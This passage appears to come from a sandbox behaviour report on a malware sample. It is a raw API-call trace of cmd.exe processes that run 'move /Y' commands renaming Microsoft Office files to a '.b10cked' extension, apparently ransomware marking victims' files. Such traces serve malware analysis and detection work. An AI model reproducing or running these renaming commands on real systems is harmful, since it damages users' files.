(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.769] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0168.769] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0168.769] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0168.769] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~2.trx")) returned 0x2020 [0168.769] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.770] SetErrorMode (uMode=0x0) returned 0x0 [0168.770] SetErrorMode (uMode=0x1) returned 0x0 [0168.770] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x22ed64, lpFilePart=0x22ed4c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", lpFilePart=0x22ed4c*="GRINTL~2.TRX") returned 0x3c [0168.770] SetErrorMode (uMode=0x0) returned 0x1 [0168.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.770] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0168.770] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0168.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~2.trx")) returned 0x2020 [0168.770] SetErrorMode (uMode=0x0) returned 0x0 [0168.770] SetErrorMode (uMode=0x1) returned 0x0 [0168.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x22f1e0, lpFilePart=0x22ef78 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", lpFilePart=0x22ef78*="GRINTL~2.TRX") returned 0x3c [0168.771] SetErrorMode (uMode=0x0) returned 0x1 
[0168.771] SetErrorMode (uMode=0x0) returned 0x0 [0168.771] SetErrorMode (uMode=0x1) returned 0x0 [0168.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22f3e8, lpFilePart=0x22ef78 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x22ef78*="GRINTL32.REST.trx_dll.b10cked") returned 0x4d [0168.771] SetErrorMode (uMode=0x0) returned 0x1 [0168.771] SetLastError (dwErrCode=0x0) [0168.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0168.771] GetLastError () returned 0x2 [0168.771] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x22e8f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e8f4) returned 0x312138 [0168.771] FindNextFileW (in: hFindFile=0x312138, lpFindFileData=0x22e8f4 | out: lpFindFileData=0x22e8f4) returned 0 [0168.772] GetLastError () returned 0x12 [0168.772] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0168.774] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x311cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311cc8) returned 0x312138 [0168.775] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22eb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0168.775] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x22eb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0168.775] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll")) returned 0x2020 [0168.775] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.776] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0168.776] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22eb40 | out: _Buffer=" 1") returned 9 [0168.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.776] GetFileType (hFile=0x7) returned 0x2 [0168.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eacc | out: lpMode=0x22eacc) returned 1 [0168.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.777] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22eb00 | out: lpConsoleScreenBufferInfo=0x22eb00) returned 1 [0168.777] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.777] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22eb40 | out: 
lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.777] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22eb24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22eb24*=0x1a) returned 1 [0168.778] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.778] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.778] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.778] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.778] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.778] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.778] SetConsoleInputExeNameW () returned 0x1 [0168.778] GetConsoleOutputCP () returned 0x1b5 [0168.779] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.779] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.779] exit (_Code=0) Process: id = "286" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xe00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22704 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22705 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22706 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22707 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22708 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22709 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22710 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22711 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22712 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22713 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22792 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22793 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = 
"" Region: id = 22794 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22795 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22796 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 22797 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22798 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22799 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22800 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22801 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22802 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22803 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22804 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22805 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22806 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 22807 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22808 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22809 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22810 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22811 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22812 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22813 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 22814 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000610000" filename = "" Region: id = 22815 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 350 os_tid = 0x894 [0168.105] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa34 | out: lpSystemTimeAsFileTime=0x16fa34*(dwLowDateTime=0x9b63e1a0, dwHighDateTime=0x1d440a9)) [0168.105] GetCurrentProcessId () returned 0xe00 [0168.105] GetCurrentThreadId () returned 0x894 [0168.105] GetTickCount () returned 0x31b9a [0168.105] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa2c | out: lpPerformanceCount=0x16fa2c*=22489452853) returned 1 [0168.106] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.106] __set_app_type (_Type=0x1) [0168.106] __p__fmode () returned 0x76b331f4 [0168.106] __p__commode () returned 0x76b331fc [0168.106] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.106] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.107] GetCurrentThreadId () returned 0x894 [0168.107] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x894) returned 0x38 [0168.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.107] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.107] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f9c4 | out: phkResult=0x16f9c4*=0x0) returned 0x2 [0168.107] VirtualQuery (in: lpAddress=0x16f9fb, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x16f000, 
AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.107] GetConsoleOutputCP () returned 0x1b5 [0168.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.108] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.108] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.108] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.109] GetEnvironmentStringsW () returned 0x2b0210* [0168.109] FreeEnvironmentStringsW (penv=0x2b0210) returned 1 [0168.109] GetEnvironmentStringsW () returned 0x2b0210* [0168.109] FreeEnvironmentStringsW (penv=0x2b0210) returned 1 [0168.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0xa0, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegCloseKey (hKey=0x40) returned 0x0 [0168.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, 
lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegCloseKey (hKey=0x40) returned 0x0 [0168.110] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.110] srand (_Seed=0x5b886386) [0168.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"" [0168.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"" [0168.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.111] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.111] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.111] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.111] _wcsicmp (_String1="PROMPT", 